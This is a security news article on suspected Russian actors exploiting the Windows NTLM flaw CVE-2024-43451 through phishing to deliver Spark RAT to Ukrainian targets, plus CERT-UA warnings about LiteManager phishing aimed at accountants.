Russian Cybercriminals Exploit NTLM Flaw to Launch RAT Malware via Phishing Attacks

November 14, 2024

A newly discovered security vulnerability in Windows NT LAN Manager (NTLM) has been exploited by suspected Russian cybercriminals in a series of cyberattacks on Ukraine. The flaw, known as CVE-2024-43451, allows for NTLM hash disclosure spoofing, which can be used to illicitly acquire a user's NTLMv2 hash. Microsoft has recently issued a patch for this vulnerability.

The exploitation of this flaw was first identified by Israeli cybersecurity company ClearSky in June 2024. The company found that it was being used in an attack chain to deliver the open-source Spark RAT malware. According to Microsoft's advisory, minimal interaction with a malicious file, such as selecting, inspecting, or performing an action other than opening or executing, could trigger this vulnerability.

The cybercriminals initiated the attack by sending phishing emails from a compromised Ukrainian government server. The email recipients were prompted to renew their academic certificates by clicking on a URL embedded in the message, which led to the download of a ZIP archive containing a malicious internet shortcut (.URL) file. The vulnerability was triggered when the victim interacted with the URL file.

This URL file was designed to establish connections with a remote server to download additional payloads, including Spark RAT. ClearSky further noted, 'In addition, a sandbox execution raised an alert about an attempt to pass the NTLM (NT LAN Manager) Hash through the SMB (Server Message Block) protocol. After receiving the NTLM Hash, an attacker can carry out a Pass-the-Hash attack to identify as the user associated with the captured hash without needing the corresponding password.'

The Computer Emergency Response Team of Ukraine (CERT-UA) has associated this activity with a probable Russian threat actor it monitors as UAC-0194. In recent weeks, CERT-UA has also alerted that tax-related phishing emails are being used to disseminate a legitimate remote desktop software named LiteManager. CERT-UA describes this attack campaign as financially motivated and carried out by a threat actor named UAC-0050. CERT-UA cautioned that 'Accountants of enterprises whose computers work with remote banking systems are in a special risk zone. In some cases, as evidenced by the results of computer forensic investigations, it may take no more than an hour from the moment of the initial attack to the moment of theft of funds.'

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.